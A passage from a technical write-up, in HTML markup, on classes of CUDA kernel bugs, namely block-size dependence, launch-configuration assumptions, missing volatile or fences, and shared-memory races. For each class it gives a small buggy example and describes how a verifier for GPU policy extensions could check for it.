&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Policies using shared memory are restricted to conflict-free index patterns (&lt;code&gt;base + threadIdx.x&lt;/code&gt; for contiguous access). The verifier statically checks shared-memory index expressions and rejects patterns with likely bank conflicts (e.g., stride-32 access). This preserves shared memory availability for per-block staging and aggregation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GKLEE explicitly lists "memory bank conflicts" among detected performance bugs via symbolic exploration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Some safe but complex index patterns may be conservatively rejected. Kernel-level bank conflict analysis requires GPUDrano-style static tools or profiling. Policies needing non-trivial shared-memory access patterns may need to demonstrate conflict-freedom through annotations or simplified indexing.&lt;/p&gt;




&lt;h3&gt;
  
  
  8) Block-Size Dependence [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Block-size independence is essential for safe block-size tuning. Kernels that implicitly depend on specific &lt;code&gt;blockDim&lt;/code&gt; values can produce incorrect results or races when launched with different configurations. This is critical for auto-tuning and portability across GPU generations. This entry focuses on &lt;strong&gt;compile-time hardcoded assumptions&lt;/strong&gt; within the kernel code itself (e.g., fixed shared memory sizes, hardcoded reduction strides), distinct from runtime launch configuration assumptions about grid dimensions.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;reduce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="c1"&gt;// Hardcoded reduction assumes exactly 256 threads&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;128&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;128&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;  &lt;span class="c1"&gt;// OOB read if blockDim.x &amp;lt; 256&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;                         &lt;span class="c1"&gt;// incomplete reduction if blockDim.x &amp;gt; 256&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="c1"&gt;// ... continues with warp-level reduction ...&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;// Launched with blockDim.x != 256 =&amp;gt; wrong results or crash&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUDrano explicitly includes "block-size independence" analysis.(&lt;a href="https://github.com/upenn-acg/gpudrano-static-analysis_v1.0" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static analysis (GPUDrano):&lt;/strong&gt; analyze kernel code for implicit blockDim dependencies.&lt;/li&gt;
&lt;li&gt;Require explicit declaration of block-size assumptions in kernel metadata.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Policies should not implicitly assume block shapes unless the verifier can guarantee them. If a policy depends on block-level structure, require declaring it (metadata) and validate at attach time. Add verifier rules that forbid hard-coded assumptions about blockDim unless explicitly declared.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E) if block-agnostic; Combined (C) if assumes blockDim. Contract-based for blockDim-dependent policies: conditional soundness (sound if declared requirements match actual launch config) with high completeness (policies can declare requirements; undeclared policies assumed block-agnostic).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Two approaches enable verification: (A) Block-agnostic design: policies use only lane-local or warp-level logic, avoiding &lt;code&gt;blockDim&lt;/code&gt; dependencies entirely, making them safe for any launch config; (B) Contract-based: policies declare block-size requirements in metadata, and the runtime validates at attach time. The verifier rejects policies with hardcoded block-size constants unless explicitly declared.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUDrano explicitly includes "block-size independence" analysis for detecting implicit blockDim dependencies in kernel code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies with undeclared blockDim dependencies may fail silently with different launch configs. The contract approach shifts responsibility to policy authors to declare requirements correctly. Recommended design: make policy APIs block-agnostic (use relative indices, not absolute sizes).&lt;/p&gt;




&lt;h3&gt;
  
  
  9) Launch Config Assumptions [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Many CUDA kernels assume certain launch configurations (e.g., single block, specific grid dimensions). Violating these assumptions leads to incorrect results or races that are hard to diagnose. This entry focuses on &lt;strong&gt;runtime launch configuration assumptions&lt;/strong&gt; (gridDim, number of blocks), distinct from compile-time hardcoded block-size dependencies within the kernel code.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;reduce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;out&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;  &lt;span class="c1"&gt;// BUG: assumes gridDim.x == 1, writes final result directly&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;              &lt;span class="c1"&gt;// if gridDim.x &amp;gt; 1, multiple blocks race on *out&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;// Called with &amp;lt;&amp;lt;&amp;lt;N/256, 256&amp;gt;&amp;gt;&amp;gt; where N &amp;gt; 256 =&amp;gt; data race, wrong result&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Wu et al.'s discussion of detected bugs includes developer responses that kernels "should not be called with more than one block" and suggests adding assertions like &lt;code&gt;assert(gridDim.x == 1)&lt;/code&gt;.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Contract checking:&lt;/strong&gt; encode launch preconditions (gridDim, blockDim assumptions) and enforce them at runtime or statically.&lt;/li&gt;
&lt;li&gt;Add runtime assertions for grid/block dimension assumptions.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policy code assumes a particular block/warp mapping (e.g., keys use &lt;code&gt;threadIdx.x&lt;/code&gt; directly), you can end up with correctness or performance regressions when kernels run under different launch configs. If a policy depends on warp- or block-level structure, require declaring it (metadata) and validate at attach time.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Combined (C): launch configuration is host-determined, not visible to policy verifier. Contract-based assurance: conditional soundness (sound only if contracts are correctly specified and validated) with completeness depending on contract expressiveness.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: This bug class fundamentally requires contracts: Extension-local verification cannot see launch parameters. The policy declares preconditions (e.g., "requires gridDim.x == 1" or "requires blockDim.x &amp;gt;= 128"), and the runtime validates at attach/launch time. Policies without explicit requirements are assumed to work with any config.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: Wu et al.'s empirical study found real bugs where developers noted kernels "should not be called with more than one block": they suggest adding runtime assertions like &lt;code&gt;assert(gridDim.x == 1)&lt;/code&gt;. Convert such requirements into contract metadata for policy verification.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Contract-based verification shifts responsibility to policy authors to declare requirements correctly. This is one of the few bug classes where Combined verification is unavoidable, but contracts provide a clean interface without requiring complex joint analysis of kernel + policy.&lt;/p&gt;




&lt;h3&gt;
  
  
  10) Missing Volatile/Fence [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;GPU code often relies on compiler and memory-model subtleties. GKLEE reports a real-world category: forgetting to mark a shared memory variable as &lt;code&gt;volatile&lt;/code&gt;, producing stale reads/writes due to compiler optimization or caching behavior. This is a GPU-flavored instance of memory visibility/ordering bugs that can be hard to reproduce.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;          &lt;span class="c1"&gt;// should sometimes be volatile / properly fenced&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;         &lt;span class="c1"&gt;// may spin if compiler hoists load / visibility issues&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GKLEE explicitly lists "forgot volatile" as a discovered bug type.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Simulee and other tools' race detection can surface some of these issues when they manifest as data races.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Symbolic exploration (GKLEE-style):&lt;/strong&gt; explore memory access orderings and detect stale read scenarios.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pattern-based linting:&lt;/strong&gt; flag spin-wait loops on shared memory without volatile or fence.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Avoid exposing raw shared/global memory communication to policies; instead provide &lt;strong&gt;helpers with explicit semantics&lt;/strong&gt; (e.g., "atomic increment" or "write once" patterns), and verify policies don't implement ad-hoc synchronization loops. Forbid spin-waiting on shared memory in policy code.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), By-construction. Banning spin-wait loops and raw shared/global memory communication eliminates volatile/fence bugs entirely, providing perfect soundness with high completeness (legitimate polling patterns are rare in policy code).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier bans spin-wait loops (&lt;code&gt;while(flag == 0)&lt;/code&gt;), flag polling patterns, and raw shared/global memory communication. All inter-thread communication must go through atomic helpers with explicit semantics (e.g., "atomic increment" or "write once" patterns). This eliminates volatile/fence bugs by forbidding the patterns that cause them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GKLEE explicitly lists "forgot volatile" as a discovered bug type via symbolic exploration. Simulee and other race detectors can surface these issues when they manifest as data races.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: ITS (Independent Thread Scheduling) changes assumptions about warp-lockstep execution, making traditional volatile assumptions unreliable: code that worked on pre-Volta architectures may race on newer GPUs. The safest approach is to ban ad-hoc synchronization entirely rather than trying to verify memory model subtleties.&lt;/p&gt;




&lt;h3&gt;
  
  
  11) Shared-Memory Data Races (&lt;code&gt;__shared__&lt;/code&gt;) [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Threads in a block access on-chip shared memory concurrently; missing/incorrect synchronization causes races. This is a classic CUDA bug class (AuCS/Wu).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;   &lt;span class="c1"&gt;// write-write race on s&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUVerify explicitly targets &lt;strong&gt;data-race freedom&lt;/strong&gt; and defines intra-group / inter-group races.(&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;Nathan Chong&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE reports finding &lt;strong&gt;races&lt;/strong&gt; (and related deadlocks) via symbolic exploration.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Simulee detects &lt;strong&gt;data race bugs&lt;/strong&gt; in real projects and uses a CUDA-aware notion of race.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Wu et al. classify &lt;strong&gt;data race&lt;/strong&gt; under "improper synchronization" as a CUDA-specific root cause.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Compute Sanitizer &lt;code&gt;racecheck&lt;/code&gt; is a runtime shared-memory hazard detector.(&lt;a href="https://www.shinhwei.com/cuda-repair.pdf" rel="noopener noreferrer"&gt;Shinhwei&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static verifier route (GPUVerify-style):&lt;/strong&gt; enforce "race-free under SIMT" by proving that any two potentially concurrent lanes/threads cannot perform conflicting accesses without proper synchronization.(&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;Nathan Chong&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic route (Simulee-style):&lt;/strong&gt; instrument / simulate memory accesses and flag conflicting pairs; good for bug-finding and regression tests.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policies have any shared state, require &lt;strong&gt;warp-uniform side effects&lt;/strong&gt; or &lt;strong&gt;single-lane side effects&lt;/strong&gt; (e.g., lane0 updates) plus explicit atomics. A conservative verifier rule is: policy code cannot write shared memory except via restricted helpers that are race-safe (e.g., per-warp aggregation).&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Option A – warp-/block-uniform single-writer rules&lt;/strong&gt; (e.g., "only lane 0 updates").&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Option B – atomic-only helpers&lt;/strong&gt; for shared objects.&lt;/li&gt;
&lt;li&gt;
